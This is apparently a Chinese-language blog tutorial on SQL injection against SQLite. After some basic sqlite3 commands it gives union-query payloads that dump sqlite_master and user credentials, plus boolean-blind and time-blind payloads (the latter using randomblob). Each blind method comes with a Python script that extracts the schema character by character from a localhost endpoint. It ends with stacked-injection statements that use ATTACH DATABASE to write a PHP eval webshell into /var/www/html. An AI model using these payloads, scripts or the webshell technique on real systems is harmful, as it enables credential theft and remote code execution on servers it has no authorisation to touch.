Featured image of post sqlite注入
基础知识

sqlite注入

sqlite注入

语法 

1
2
3
4
5

.help   获取可用的点命令的清单
.show   显示各种设置的当前值
.quite 退出SQLite 提示符
.databases 列出数据库的名称及其所依附的文件
.schema ?TABLE? 显示 CREATE 语句,例如.schema sqlite_master

数据库操作

SQLite 的 sqlite3 命令被用来创建新的 SQLite 数据库。您不需要任何特殊的权限即可创建一个数据。 另外我们也可以使用 .open 来建立新的数据库文件:

1
2
3
4
5
6

sqlite3 dbname.db
SQLite version 3.32.3 2020-06-18 14:16:19
Enter ".help" for usage hints.
sqlite> .databases
main: /Users/ye1s/Desktop/work/dbname.db
sqlite> .open test.db

SQLite可以附加数据库,假设这样一种情况,当在同一时间有多个数据库可用,您想使用其中的任何一个。SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库。

例如想附加一个数据库 testDB.db。

1
2
3
4

sqlite> ATTACH DATABASE 'testDB.db' as 'TEST';
sqlite> .databases
main: /Users/ye1s/Desktop/work/dbname.db
TEST: /Users/ye1s/Desktop/work/testDB.db

表操作

CREATE TABLE 语句用来创建一个新表,.tables查看创建的表, .schema 可查看表的完整信息,INSERT INTO 向表中添加信息,drop table 删除表。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

sqlite> CREATE TABLE USERS(
 ...>   ID INT PRIMARY KEY     NOT NULL,
 ...>   USERNAME           TEXT    NOT NULL,
 ...>    PASSWORD           TEXT     NOT NULL
 ...> );
sqlite> .tables
USERS
sqlite> .schema users
CREATE TABLE USERS(
 ID INT PRIMARY KEY     NOT NULL,
 USERNAME           TEXT    NOT NULL,
 PASSWORD           TEXT    NOT NULL
);
sqlite> INSERT INTO users (id,username,password) VALUES (1, 'admin', 'password');
sqlite> select * from users;
1|admin|password
sqlite> .header on
sqlite> .mode column
sqlite> select * from users;
ID         USERNAME    PASSWORD  
----------  ----------  ----------
1           admin       password  
sqlite> drop table users;
sqlite> .tables

sqlite注入

SQLite相关注意点:

1.SQLite_master:这个是内置系统表、相当于mysql的information_schema,但是这里只存有表的信息,里面有个sql字段,有各个表的结构,有表名,字段名和类型。

2.SQLite并不支持像mysql那样的注释,但是可以通过 - 方式增加DDL注释(写shell会用到)SQL,并扩展至下一个换行符(ASCII 0x0a)或直到输入结束,以先到者为准。您也可以使用 C 风格的注释,以 /*开始,并扩展至下一个 */字符对或直到输入结束,以先到者为准。SQLite的注释可以跨越多行。

联合查询

闭合语句

1
2
3

1';
1' -- 
1' /*

1
2
3
4
5

1' order by 5 --
-1' union select 1,2,3 --
-1' union select 1,2,sqlite_version() --
-1' union select 1, (select sql from sqlite_master) ,3--
-1' union select 1, (select group_concat(USERNAME,PASSWORD) from users) ,3--

布尔盲注

布尔盲注通过查询正确和错误返回的页面不同来判断数据内容。 SQLite不支持ascii,所以直接通过字符去查询,这里和mysql不同,这个区分大小写。也没有mid,left等函数。

1

-1' or substr((select group_concat(sql) from sqlite_master),1,1)<'a'/*

注入脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

import requests
url = 'http://localhost:9000/index.php'
flag = ''
for i in range(1,500):
 low = 32
 high = 128
 mid = (low+high)//2
 while(low<high):
     payload = "-1' or substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}'/*".format(i,chr(mid))
     datas = {
         "id": payload
     }
     res = requests.post(url=url,data=datas)

     if 'Username' in res.text:
         low = mid+1
     else:
         high = mid
     mid = (low+high)//2
 if(mid ==32 or mid ==127):
     break
 flag = flag+chr(mid)
 print(flag)
	
print('\n'+bytes.fromhex(flag).decode('utf-8'))

时间盲注

SQLite没有sleep()函数,但可以用randomblob(N)函数,randomblob(N) 函数,其作用是返回一个 N 字节长的包含伪随机字节的 BLOG。 N 是正整数。可以用它来制造延时。SQLite没有if,所以需要使用case……when来代替。

1

-1' or (case when(substr(sqlite_version(),1,1)>'3') then randomblob(300000000) else 0 end)/*

脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

import requests
import time
url = 'http://localhost:9000/index.php'
flag = ''
for i in range(1,500):
 low = 32
 high = 128
 mid = (low+high)//2
 while(low<high):
     payload = "-1' or (case when(substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}') then randomblob(300000000) else 0 end)/*".format(i,chr(mid))
     datas = {
         "id": payload
     }
     start_time=time.time()
     res = requests.post(url=url,data=datas)
     end_time=time.time()
     spend_time=end_time-start_time
     if spend_time>=2:
         low = mid+1
     else:
         high = mid
     mid = (low+high)//2
 if(mid ==32 or mid ==127):
     break
 flag = flag+chr(mid)
 print(flag)

print('\n'+bytes.fromhex(flag).decode('utf-8'))

写入webshell

SQLite 的 ATTACH DATABASE 语句是用来选择一个特定的数据库,使用该命令后,所有的 SQLite 语句将在附加的数据库下执行。

1

ATTACH DATABASE file_name AS database_name;

如果附加数据库不存在,就会创建该数据库,如果数据库文件设置在web目录下,就可以写入webshell。

1
2
3

ATTACH DATABASE '/var/www/html/shell.php' AS shell;
create TABLE shell.exp (webshell text); 
insert INTO shell.exp (webshell) VALUES ('<?php eval($_POST[a]);?>');

示例代码使用的是 query() 函数来执行 SQL 语句,此时无法执行分号隔离的多条语句。可以将 query() 换成 exec(),可造成堆叠注入,就可以写 Webshell 了,exec()函数执行后没有回显。执行如下语句:

1
2
3

1';ATTACH DATABASE '/var/www/html/shell.php' AS shell;
create TABLE shell.exp (webshell text); 
insert INTO shell.exp (webshell) VALUES ('<?php eval($_POST[a]);?>'); /*
Sql
Licensed under 9u_l3
© 2025 无敌可爱美咕噜
使用 Hugo 构建
主题 StackJimmy 设计